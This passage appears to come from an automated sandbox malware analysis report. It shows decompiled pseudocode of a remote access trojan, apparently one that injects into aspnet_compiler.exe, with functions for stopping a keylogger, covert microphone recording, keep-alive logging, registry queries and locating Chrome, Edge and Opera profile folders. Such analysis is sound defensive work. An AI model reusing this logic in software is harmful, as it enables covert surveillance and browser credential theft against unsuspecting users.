					if(_t33 !=  *((intOrPtr*)(_t34 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t34 = _t34 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				__eflags = _t26;
				goto L9;
			}


















                0x004503bc
                0x004503bd
                0x004503c0
                0x004503c4
                0x0045046a
                0x0045047e
                0x00450483
                0x00450485
                0x0045048b
                0x0045048e
                0x00450490
                0x00450492
                0x00450492
                0x00450498
                0x0045049d
                0x0045049d
                0x00450487
                0x00450487
                0x00000000
                0x00450487
                0x004503ca
                0x004503cf
                0x00000000
                0x00000000
                0x004503d5
                0x004503da
                0x004503dc
                0x004503dc
                0x004503e2
                0x00000000
                0x00000000
                0x004503e7
                0x004503fe
                0x004503fe
                0x00450407
                0x00450409
                0x00000000
                0x00000000
                0x0045040b
                0x00450410
                0x00450412
                0x00450412
                0x00450418
                0x00000000
                0x00000000
                0x0045041d
                0x0045043b
                0x0045043b
                0x0045043d
                0x00450462
                0x00000000
                0x00450467
                0x0045045a
                0x00000000
                0x00000000
                0x0045045c
                0x00000000
                0x0045045c
                0x0045041f
                0x00450427
                0x00000000
                0x00000000
                0x00450429
                0x0045042c
                0x00450432
                0x00000000
                0x00000000
                0x00000000
                0x00450434
                0x00450436
                0x00450438
                0x00450438
                0x00000000
                0x00450438
                0x004503e9
                0x004503f1
                0x00000000
                0x00000000
                0x004503f3
                0x004503f6
                0x004503fc
                0x00000000
                0x00000000
                0x00000000
                0x004503fc
                0x00450402
                0x00450404
                0x00450404
                0x00000000

                APIs
                • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00450612,?,00000050,?,?,?,?,?), ref: 00450492
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: ACP$OCP
                • API String ID: 0-711371036
                • Opcode ID: f1c7551b471a892f553800437845e87fa4d211da0bcbbc8f051b82ee5a92802c
                • Instruction ID: b93994b24156d93d71cef3ddff737944661d95d4cf4e28bf2754044b1fc000f2
                • Opcode Fuzzy Hash: f1c7551b471a892f553800437845e87fa4d211da0bcbbc8f051b82ee5a92802c
                • Instruction Fuzzy Hash: 0521066AA00100A6DB34CA54C901B9B7356DF52B57F56842AEF0AD7303F73ADD4AC358
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00404FD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
                Download Yara Rule
                C-Code - Quality: 86%
                			E00404FD4(intOrPtr _a4) {
				char _v24;
				void* _v28;
				struct _SYSTEMTIME _v40;
				void* __ebx;
				void* __ebp;
				void* _t11;
				void* _t17;
				void* _t35;
				intOrPtr _t36;
				void* _t38;
				void* _t42;
				void* _t43;

				if( *0x473544 == 0) {
					__eflags = 0;
					return 0;
				}
				_t36 = _a4;
				if( *0x470d48 == 0) {
					L7:
					 *0x473560 =  *0x473560 & 0x00000000;
					 *0x473565 = 1;
					 *0x47355c = _t36;
					return 1;
				}
				_t46 =  *0x473564;
				_t22 = "KeepAlive             | Enabled | Timeout: ";
				_t37 = "i";
				if( *0x473564 != 0) {
					GetLocalTime( &_v40);
					_t17 = E0041A6E9("KeepAlive             | Enabled | Timeout: ",  &_v24, _t36);
					_t42 = _t38 - 0x18;
					E004052DD(_t22, _t42, _t22, "i", _t46, _t17);
					_t43 = _t42 - 0x14;
					E00402073(_t22, _t43, _t22, "i", _t37);
					E0041A04A(_t22, _t35);
					_t38 = _t43 + 0x30;
					E00401FB8();
					 *0x473564 = 0;
				}
				if( *0x47355c != _t36) {
					_t48 =  *0x473565;
					if( *0x473565 != 0) {
						GetLocalTime( &_v40);
						_t11 = E0041A6E9(_t22,  &_v24, _t36);
						_t39 = _t38 - 0x18;
						E004052DD(_t22, _t38 - 0x18, _t22, _t37, _t48, _t11);
						E00402073(_t22, _t39 - 0x14, _t22, _t37, _t37);
						E0041A04A(_t22, _t35);
						E00401FB8();
					}
				}
				goto L7;
			}















                0x00404fe1
                0x004050b9
                0x00000000
                0x004050b9
                0x00404fee
                0x00404ff2
                0x004050a1
                0x004050a1
                0x004050aa
                0x004050b1
                0x00000000
                0x004050b1
                0x00404ff8
                0x00404fff
                0x00405004
                0x00405009
                0x00405010
                0x0040501c
                0x00405021
                0x00405029
                0x0040502e
                0x00405034
                0x00405039
                0x0040503e
                0x00405045
                0x0040504a
                0x0040504a
                0x00405057
                0x00405059
                0x00405060
                0x00405067
                0x00405073
                0x00405078
                0x00405080
                0x0040508b
                0x00405090
                0x0040509c
                0x0040509c
                0x00405060
                0x00000000

                APIs
                • GetLocalTime.KERNEL32(?,004734E8,?,00000000,?,?,?,?,?,?,00415007,?,00000001,0000004C,00000000), ref: 00405010
                  • Part of subcall function 0041A04A: GetLocalTime.KERNEL32(00000000), ref: 0041A064
                • GetLocalTime.KERNEL32(?,004734E8,?,00000000,?,?,?,?,?,?,00415007,?,00000001,0000004C,00000000), ref: 00405067
                Strings
                • KeepAlive | Enabled | Timeout: , xrefs: 00404FFF
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: LocalTime
                • String ID: KeepAlive | Enabled | Timeout:
                • API String ID: 481472006-1507639952
                • Opcode ID: f6f4986efb37b8d342486ec4eef68092672092b0f0007e9071cdaf16fe546712
                • Instruction ID: 9a4cfd33936eaa6b36ea74c7cc729b7cf4cbb54b4ad27954b172034734b4d9a3
                • Opcode Fuzzy Hash: f6f4986efb37b8d342486ec4eef68092672092b0f0007e9071cdaf16fe546712
                • Instruction Fuzzy Hash: AC2129719043806BD714FB25DC4575F7B54AB45309F04057EF485532A2DA3D5688CBEB
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0041A04A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                Download Yara Rule
                C-Code - Quality: 73%
                			E0041A04A(void* __ebx, void* __edi, char _a4, char _a28) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				signed short _v102;
				signed short _v104;
				signed short _v106;
				signed short _v108;
				void* __ebp;
				void* _t57;
				signed int _t58;
				struct _SYSTEMTIME* _t60;

				_t60 = (_t58 & 0xfffffff8) - 0x70;
				_t62 =  *0x470d48;
				if( *0x470d48 != 0) {
					GetLocalTime(_t60);
					_push(_v102 & 0x0000ffff);
					_push(_v104 & 0x0000ffff);
					_push(_v106 & 0x0000ffff);
					E00406874(_t62, E00401F8B(E00408832(__ebx,  &_v100, E00402EF0(__ebx,  &_v76, E00408832(__ebx,  &_v52, E004052FE( &_v28, "%02i:%02i:%02i:%03i ", _t57,  &_a4), __edi, _t57, _t62, " | "), _t57, _t62,  &_a28), __edi, _t57, _t62, "\n")), _v108 & 0x0000ffff);
					E00401FB8();
					E00401FB8();
					E00401FB8();
					E00401FB8();
				}
				E00401FB8();
				return E00401FB8();
			}















                0x0041a050
                0x0041a053
                0x0041a05a
                0x0041a064
                0x0041a073
                0x0041a07e
                0x0041a084
                0x0041a0cf
                0x0041a0db
                0x0041a0e4
                0x0041a0ed
                0x0041a0f6
                0x0041a0f6
                0x0041a0fe
                0x0041a10e

                APIs
                • GetLocalTime.KERNEL32(00000000), ref: 0041A064
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: LocalTime
                • String ID: | $%02i:%02i:%02i:%03i
                • API String ID: 481472006-2430845779
                • Opcode ID: 73f1784e6b0f8c6c2b56327e02b954a3cae6b777a92ff4e659f5f7ca666b0f94
                • Instruction ID: 305aa241e5e1249f2c56a36f0bedab380cdf1516fdeeb0388db8af3b2f80b87a
                • Opcode Fuzzy Hash: 73f1784e6b0f8c6c2b56327e02b954a3cae6b777a92ff4e659f5f7ca666b0f94
                • Instruction Fuzzy Hash: DD11637250820156C704FBA5D841CAFB3E8AF84348F504A3FF485A21E1EF3CD945CB5A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004016EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                Download Yara Rule
                C-Code - Quality: 69%
                			E004016EF(signed int __ecx, unsigned int __edx, void* __edi, void* __esi, void* __ebp, char _a8) {
				signed int _v0;
				char _v20;
				void* __ebx;
				signed int _t19;
				signed int _t20;
				void* _t21;
				signed int _t29;
				unsigned int _t30;
				long _t37;
				signed int _t40;

				E00401FA0(0x472d74,  &_a8);
				_t29 = _v0;
				0x470aa8->wFormatTag = 1;
				_t19 = (__edx & 0x0000ffff) >> 3;
				asm("movd xmm0, edx");
				asm("cvtdq2pd xmm0, xmm0");
				 *0x470aac = _t29;
				 *0x470ab6 = __edx;
				_t30 = _t29 >> 0x1f;
				 *0x470aaa = __ecx;
				asm("addsd xmm0, [edx*8+0x46b1e0]");
				 *0x470ab0 = (__ecx & 0x0000ffff) * _t19 * _t29;
				_t37 = 0;
				 *0x470ab8 = 0;
				asm("cvtpd2ps xmm0, xmm0");
				 *0x470ab4 = (__edx >> 0x00000003 & 0x0000ffff) * (__ecx & 0x0000ffff);
				asm("mulss xmm0, [0x46b18c]");
				asm("cvttss2si eax, xmm0");
				_t20 = _t19 * 0;
				_t40 = _t20;
				 *0x470abc = 0;
				 *0x470a80 = _t20;
				waveInOpen(0x470ac8, 0xffffffff, 0x470aa8, 0x40184a, 0, 0x30008);
				do {
					E004017CC(_t37, _t30, _t40);
					_t37 = _t37 + 1;
				} while (_t37 < 2);
				waveInStart( *0x470ac8);
				_pop(_t21);
				return E004023AE(_t21,  &_v20, __ebp, 1, 0);
			}













                0x00401700
                0x00401705
                0x0040170f
                0x00401715
                0x0040171e
                0x00401722
                0x00401726
                0x0040172c
                0x00401742
                0x00401745
                0x0040174c
                0x00401755
                0x0040175d
                0x00401764
                0x0040176a
                0x00401780
                0x00401787
                0x0040178f
                0x00401793
                0x00401793
                0x00401796
                0x0040179b
                0x004017a1
                0x004017a7
                0x004017a9
                0x004017ae
                0x004017af
                0x004017ba
                0x004017c6
                0x00401fc1

                APIs
                • waveInOpen.WINMM(00470AC8,000000FF,00470AA8,0040184A,00000000,00030008,?), ref: 004017A1
                  • Part of subcall function 004017CC: waveInPrepareHeader.WINMM(?,00000020,00000000,00000000,?,00000000,?,?,004017AE), ref: 00401829
                  • Part of subcall function 004017CC: waveInAddBuffer.WINMM(?,00000020,?,00000000,?,?,004017AE), ref: 0040183F
                • waveInStart.WINMM ref: 004017BA
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: wave$BufferHeaderOpenPrepareStart
                • String ID: t-G
                • API String ID: 4183526013-1680578370
                • Opcode ID: 3d24f6267b8bac03b3880ecd6faf7845489f839e1f41d23f6f3b62a1441da131
                • Instruction ID: 95a711b6e76d91f395065626d5ac92766c974447fb9b8fe42a04c668eb71b703
                • Opcode Fuzzy Hash: 3d24f6267b8bac03b3880ecd6faf7845489f839e1f41d23f6f3b62a1441da131
                • Instruction Fuzzy Hash: 1E110071A15310DEC359DB35AC40956B6E8EFAA365B10823BE04AE72F0E7384480C75C
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040B6DC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50threadCOMMON
                Download Yara Rule
                C-Code - Quality: 92%
                			E0040B6DC(signed int __edx) {
				char _v8;
				void* __ecx;
				void* _t6;
				char _t15;

				_push(_t15);
				 *0x470b19 = _t15;
				 *0x470b28 = __edx * 0xea60;
				if(_t15 == 0) {
					L4:
					CreateThread(0, 0, E0040B586, 0, 0, 0);
					_t6 = 1;
				} else {
					_t26 = "FR";
					_v8 = 0;
					if(E004127E7(0x473238, E00401F8B(0x473238), "FR") == 0) {
						goto L4;
					} else {
						E00412831(E00401F8B(0x473238), _t26,  &_v8);
						if(_v8 == 0) {
							goto L4;
						} else {
							_t6 = 0;
						}
					}
				}
				return _t6;
			}







                0x0040b6df
                0x0040b6ea
                0x0040b6f1
                0x0040b6f8
                0x0040b739
                0x0040b743
                0x0040b749
                0x0040b6fa
                0x0040b6fa
                0x0040b6ff
                0x0040b719
                0x00000000
                0x0040b71b
                0x0040b729
                0x0040b733
                0x00000000
                0x0040b735
                0x0040b735
                0x0040b735
                0x0040b733
                0x0040b719
                0x0040b751

                APIs
                • CreateThread.KERNEL32 ref: 0040B743
                  • Part of subcall function 004127E7: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B716,00464C08), ref: 004127FE
                  • Part of subcall function 004127E7: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,00000000,?,?,0040B716,00464C08), ref: 00412812
                  • Part of subcall function 004127E7: RegCloseKey.KERNELBASE(?,?,?,0040B716,00464C08), ref: 0041281D
                  • Part of subcall function 00412831: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00412851
                  • Part of subcall function 00412831: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,00473238), ref: 0041286F
                  • Part of subcall function 00412831: RegCloseKey.KERNELBASE(?), ref: 0041287A
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CloseOpenQueryValue$CreateThread
                • String ID: 82G$Cqt
                • API String ID: 3520877709-164559435
                • Opcode ID: 3997dbd3b2fee93201a8807a607ca5a04ba4ba77cef879933a9cd44b6ecea690
                • Instruction ID: aa30cb8e898e471b953b87efe3deb9bdc24ff20182dd0f4763c4c7706c19c14b
                • Opcode Fuzzy Hash: 3997dbd3b2fee93201a8807a607ca5a04ba4ba77cef879933a9cd44b6ecea690
                • Instruction Fuzzy Hash: 8CF0F93070221477C7105B666C858EBBB9DCE83B65310407FF805A7381DB799E4642FD
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00419872 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                Download Yara Rule
                C-Code - Quality: 76%
                			E00419872(void* __ebx) {
				char _v28;
				void* __ebp;
				void* _t28;
				void* _t29;
				void* _t36;
				signed int _t37;
				void* _t39;

				_t39 = (_t37 & 0xfffffff8) - 0x1c;
				E0040CEEC( &_v28, 0x30, "alarm.wav");
				if(PathFileExistsW(E00401EE4( &_v28)) != 0) {
					L7:
					E0041991B(E00401EE4( &_v28));
				} else {
					if(E00405AE5(0x464074) == 0) {
						E0041AE6B(0x4738b8, E00401EE4( &_v28));
						goto L7;
					} else {
						_t43 =  *0x472aca;
						_t28 = _t39 - 0x18;
						_push(0x46a8dc);
						if( *0x472aca == 0) {
							E00402073(__ebx, _t28, 0x464074, _t36);
							_t29 = 0x4734e8;
						} else {
							E00402073(__ebx, _t28, 0x464074, _t36);
							_t29 = 0x4738d0;
						}
						_push(0xa1);
						E00404A81(_t29, 0x464074, _t43);
					}
				}
				return E00401EE9();
			}










                0x00419878
                0x00419887
                0x0041989f
                0x004198fd
                0x00419908
                0x004198a1
                0x004198b4
                0x004198f8
                0x00000000
                0x004198b6
                0x004198b9
                0x004198c0
                0x004198c2
                0x004198c7
                0x004198d5
                0x004198da
                0x004198c9
                0x004198c9
                0x004198ce
                0x004198ce
                0x004198df
                0x004198e4
                0x004198e4
                0x004198b4
                0x0041991a

                APIs
                • PathFileExistsW.SHLWAPI(00000000,00000000,?,?,?,?,?,00415F1F,00000000), ref: 00419897
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ExistsFilePath
                • String ID: alarm.wav$4G
                • API String ID: 1174141254-2977537865
                • Opcode ID: d272e0991f2b056bc812bbc590206f8d3f4e67015d279ed5f53dfe57b56d3e37
                • Instruction ID: 34e28ac8ce078d76f0f9f0665c2abcaeee574b9cd4657200da68d7dd76b5aff6
                • Opcode Fuzzy Hash: d272e0991f2b056bc812bbc590206f8d3f4e67015d279ed5f53dfe57b56d3e37
                • Instruction Fuzzy Hash: 2001C020B1420056CA14FA76D8666EE26859B81358F00417FF819662E2EF7D4D85D2DF
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040A5C4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                Download Yara Rule
                C-Code - Quality: 84%
                			E0040A5C4(void* __ebx, struct HHOOK__** __ecx, void* __edx) {
				char _v28;
				void* __edi;
				void* __ebp;
				struct HHOOK__** _t30;
				void* _t31;
				void* _t32;

				_t30 = __ecx;
				_t37 =  *((char*)(__ecx + 0x4a));
				if( *((char*)(__ecx + 0x4a)) == 0) {
					__eflags = 0;
					return 0;
				}
				E00402073(__ebx,  &_v28, __edx, _t31, "Online Keylogger Stopped");
				E0041A7B9(_t32 - 0x18,  &_v28);
				E0040A6DA(__ebx, _t30, _t37);
				E00401FB8();
				E00402073(__ebx, _t32,  &_v28, _t31, "Online Keylogger Stopped");
				E00402073(__ebx, _t32 - 0xffffffffffffffe8,  &_v28, _t31, "i");
				E0041A04A(__ebx, "Online Keylogger Stopped");
				_t30[0x12] = 0;
				CloseHandle(_t30[0xf]);
				if(_t30[0x12] == 0 &&  *_t30 != 0) {
					UnhookWindowsHookEx( *_t30);
					 *_t30 =  *_t30 & 0x00000000;
				}
				return 1;
			}









                0x0040a5cb
                0x0040a5ce
                0x0040a5d2
                0x0040a647
                0x00000000
                0x0040a647
                0x0040a5dd
                0x0040a5ea
                0x0040a5f1
                0x0040a5f9
                0x0040a604
                0x0040a613
                0x0040a618
                0x0040a620
                0x0040a627
                0x0040a631
                0x0040a63a
                0x0040a640
                0x0040a640
                0x00000000

                APIs
                  • Part of subcall function 0040A6DA: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A6E8
                  • Part of subcall function 0040A6DA: wsprintfW.USER32 ref: 0040A769
                  • Part of subcall function 0041A04A: GetLocalTime.KERNEL32(00000000), ref: 0041A064
                • CloseHandle.KERNEL32(?), ref: 0040A627
                • UnhookWindowsHookEx.USER32 ref: 0040A63A
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                • String ID: Online Keylogger Stopped
                • API String ID: 1623830855-1496645233
                • Opcode ID: e4fbb39f625da648bd772e9ec3b8865b03d7b6b24e3156352346ea33974c60de
                • Instruction ID: 152bd68872477db56328b5f984a61734b927b4b139483ca97bc76b34e3d0b4bf
                • Opcode Fuzzy Hash: e4fbb39f625da648bd772e9ec3b8865b03d7b6b24e3156352346ea33974c60de
                • Instruction Fuzzy Hash: 7301F531A043005BD7217B65D80BBBE7B755B41305F44046FE581222D2EBBA19A6D7DF
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004017CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004017CC(signed int __ecx, void* __edx, void* __eflags) {
				void* __ebp;
				long _t10;
				signed int _t17;
				struct wavehdr_tag* _t25;

				_t28 = __eflags;
				E00401E45(0x472d34, __edx, 0x472d34, __eflags, __ecx);
				E00401F7D( *0x470a80);
				_t17 = __ecx << 5;
				_t25 =  *0x472d70 + _t17;
				_t25->lpData = E00401F8B(E00401E45(0x472d34, __edx, 0x472d34, _t28, __ecx));
				_t10 =  *0x470a80; // 0x0
				_t25->dwBufferLength = _t10;
				_t25->dwBytesRecorded = 0;
				_t25->dwUser = 0;
				_t25->dwFlags = 0;
				_t25->dwLoops = 0;
				waveInPrepareHeader( *0x470ac8, _t25, 0x20);
				return waveInAddBuffer( *0x470ac8,  *0x472d70 + _t17, 0x20);
			}







                0x004017cc
                0x004017e0
                0x004017e7
                0x004017f4
                0x004017fa
                0x00401808
                0x0040180a
                0x0040180f
                0x00401817
                0x0040181a
                0x0040181d
                0x00401820
                0x00401829
                0x00401849

                APIs
                • waveInPrepareHeader.WINMM(?,00000020,00000000,00000000,?,00000000,?,?,004017AE), ref: 00401829
                • waveInAddBuffer.WINMM(?,00000020,?,00000000,?,?,004017AE), ref: 0040183F
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: wave$BufferHeaderPrepare
                • String ID: 4-G
                • API String ID: 2315374483-347150978
                • Opcode ID: 3e08850692b404ea83f60d83b64b85df34babf4643777886e7b387fe8397b049
                • Instruction ID: 6b7ed70fd603f0a3b73b27032148b84c73c10b4b752733d916ddca8c7a8238c5
                • Opcode Fuzzy Hash: 3e08850692b404ea83f60d83b64b85df34babf4643777886e7b387fe8397b049
                • Instruction Fuzzy Hash: B201AD71302300AFC7509F35EC4492ABBA9FB89305B01413AF809C37A2EB7998508B98
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00447366 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 29%
                			E00447366(void* __ecx, void* __esi, void* __eflags, char _a4) {
				signed int _v8;
				signed int _t5;
				intOrPtr* _t18;
				signed int _t20;

				_t13 = __ecx;
				_push(__ecx);
				_t5 =  *0x46f00c; // 0xd60a1515
				_v8 = _t5 ^ _t20;
				_push(__esi);
				_t18 = E00446D4A(0x15, "IsValidLocaleName", 0x45d1a8, "IsValidLocaleName");
				if(_t18 == 0) {
					_t3 =  &_a4; // 0x4433eb
					IsValidLocale(E004474BB(_t13, _t18, __eflags,  *_t3, 0), 1);
				} else {
					_t2 =  &_a4; // 0x4433eb
					 *0x4574c8( *_t2);
					 *_t18();
				}
				return E004338BB(_v8 ^ _t20);
			}







                0x00447366
                0x0044736b
                0x0044736c
                0x00447373
                0x00447376
                0x0044738d
                0x00447394
                0x004473a9
                0x004473b2
                0x00447396
                0x00447396
                0x0044739b
                0x004473a1
                0x004473a1
                0x004473c6

                APIs
                • IsValidLocale.KERNEL32(00000000,3D,00000000,00000001,?,?,004433EB,?,?,00442DCB,?,00000004), ref: 004473B2
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: LocaleValid
                • String ID: IsValidLocaleName$3D
                • API String ID: 1901932003-2077415542
                • Opcode ID: dbdf72e8e2661f57c780aa44d4f8bbb8f5dee09d7a0af35499866a64bb157ce1
                • Instruction ID: 1aafa65fd00d6e25da83e5a77131e27d47e67d355686313c1ce54cf128189aa6
                • Opcode Fuzzy Hash: dbdf72e8e2661f57c780aa44d4f8bbb8f5dee09d7a0af35499866a64bb157ce1
                • Instruction Fuzzy Hash: 25F0B430A84608B7E7106B219C06FAD7B54CF05712F10416AFD056A282DA795E0295ED
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040BA3D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E0040BA3D(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags) {
				char _v28;
				void* __ebp;
				int _t10;
				void* _t22;
				void* _t25;
				void* _t26;
				void* _t27;

				_t25 = __edi;
				_t24 = __edx;
				_t16 = __ebx;
				_t26 = __ecx;
				E0040415E(__ebx,  &_v28, __edx, _t27, E0043A99F(__ebx, __ecx, __eflags, L"UserProfile"));
				L004086C6(__ebx,  &_v28, _t25, _t27, L"\\AppData\\Local\\Google\\Chrome\\");
				_t10 = PathFileExistsW(E00401EE4( &_v28));
				_t22 = _t26;
				_t29 = _t10;
				if(_t10 == 0) {
					E0040415E(_t16, _t22, _t24, _t27, 0x46a8f0);
				} else {
					E00403242(_t16, _t22, _t27, _t29,  &_v28);
				}
				E00401EE9();
				return _t26;
			}










                0x0040ba3d
                0x0040ba3d
                0x0040ba3d
                0x0040ba49
                0x0040ba55
                0x0040ba62
                0x0040ba70
                0x0040ba76
                0x0040ba78
                0x0040ba7a
                0x0040ba8c
                0x0040ba7c
                0x0040ba80
                0x0040ba80
                0x0040ba94
                0x0040ba9f

                APIs
                • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000,?,?,?,?,?,0040BB7D), ref: 0040BA70
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ExistsFilePath
                • String ID: UserProfile$\AppData\Local\Google\Chrome\
                • API String ID: 1174141254-4188645398
                • Opcode ID: 30d8304dee5dd343242b5c7e6b1708413699e83762e1f6619c83e17cad9642f1
                • Instruction ID: fa1b3df0c65eba921df0d08a7c52afbe64c16d4fabbb7ff89d5955b2db38ff16
                • Opcode Fuzzy Hash: 30d8304dee5dd343242b5c7e6b1708413699e83762e1f6619c83e17cad9642f1
                • Instruction Fuzzy Hash: D0F08230A0131AA6CA14FBE6DC478FF7B6CCD10754B10007FBA01B22D2EE79994586DE
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040BAA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E0040BAA0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags) {
				char _v28;
				void* __ebp;
				int _t10;
				void* _t22;
				void* _t25;
				void* _t26;
				void* _t27;

				_t25 = __edi;
				_t24 = __edx;
				_t16 = __ebx;
				_t26 = __ecx;
				E0040415E(__ebx,  &_v28, __edx, _t27, E0043A99F(__ebx, __ecx, __eflags, L"UserProfile"));
				L004086C6(__ebx,  &_v28, _t25, _t27, L"\\AppData\\Local\\Microsoft\\Edge\\");
				_t10 = PathFileExistsW(E00401EE4( &_v28));
				_t22 = _t26;
				_t29 = _t10;
				if(_t10 == 0) {
					E0040415E(_t16, _t22, _t24, _t27, 0x46a8f0);
				} else {
					E00403242(_t16, _t22, _t27, _t29,  &_v28);
				}
				E00401EE9();
				return _t26;
			}










                0x0040baa0
                0x0040baa0
                0x0040baa0
                0x0040baac
                0x0040bab8
                0x0040bac5
                0x0040bad3
                0x0040bad9
                0x0040badb
                0x0040badd
                0x0040baef
                0x0040badf
                0x0040bae3
                0x0040bae3
                0x0040baf7
                0x0040bb02

                APIs
                • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000,?,?,?,?,?,?,0040BC46), ref: 0040BAD3
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ExistsFilePath
                • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                • API String ID: 1174141254-2800177040
                • Opcode ID: c12edad087ec841e52bd068fea6dfcced86c620b63673021869a425c546317f4
                • Instruction ID: e51b4f52c028d78bdf66c263ab0f3750d3580a43710b0836be6e4890ee81e12e
                • Opcode Fuzzy Hash: c12edad087ec841e52bd068fea6dfcced86c620b63673021869a425c546317f4
                • Instruction Fuzzy Hash: 5CF08231A0121A96CA14F7E6DC478FF7B6CCD10718B00007FBA01B22D2EE799941C6DE
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040BB03 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E0040BB03(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags) {
				char _v28;
				void* __ebp;
				int _t10;
				void* _t22;
				void* _t25;
				void* _t26;
				void* _t27;

				_t25 = __edi;
				_t24 = __edx;
				_t16 = __ebx;
				_t26 = __ecx;
				E0040415E(__ebx,  &_v28, __edx, _t27, E0043A99F(__ebx, __ecx, __eflags, L"AppData"));
				L004086C6(__ebx,  &_v28, _t25, _t27, L"\\Opera Software\\Opera Stable\\");
				_t10 = PathFileExistsW(E00401EE4( &_v28));
				_t22 = _t26;
				_t29 = _t10;
				if(_t10 == 0) {
					E0040415E(_t16, _t22, _t24, _t27, 0x46a8f0);
				} else {
					E00403242(_t16, _t22, _t27, _t29,  &_v28);
				}
